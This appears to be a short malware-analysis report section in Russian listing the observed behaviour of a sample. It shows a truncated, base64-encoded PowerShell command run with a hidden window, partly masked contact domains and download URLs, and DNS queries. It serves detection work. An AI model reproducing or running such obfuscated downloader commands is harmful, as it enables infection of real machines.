Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAHUAMQAwAHQANABxAD0AKAAnAFAAcwAnACsAJwAxAGUAdwBtACcAKwAnAGEAJwApADsALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- 'sr#######eswarainfratech.com':80
- 'pa#####balschool.com':80
- 'lo###nthego.com':80
- 'pa#####nenterprise.com':80
- 'sa###erv.com':443
- http://zm###dia.com/cgi-bin/wd/
- http://mo####riatrics.com/wp-admin/9s/
- DNS ASK zm###dia.com
- DNS ASK mo####riatrics.com
- DNS ASK sr#######eswarainfratech.com
- DNS ASK pa#####balschool.com
- DNS ASK lo###nthego.com
- DNS ASK pa#####nenterprise.com
- DNS ASK sa###erv.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAHUAMQAwAHQANABxAD0AKAAnAFAAcwAnACsAJwAxAGUAdwBtACcAKwAnAGEAJwApADsALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)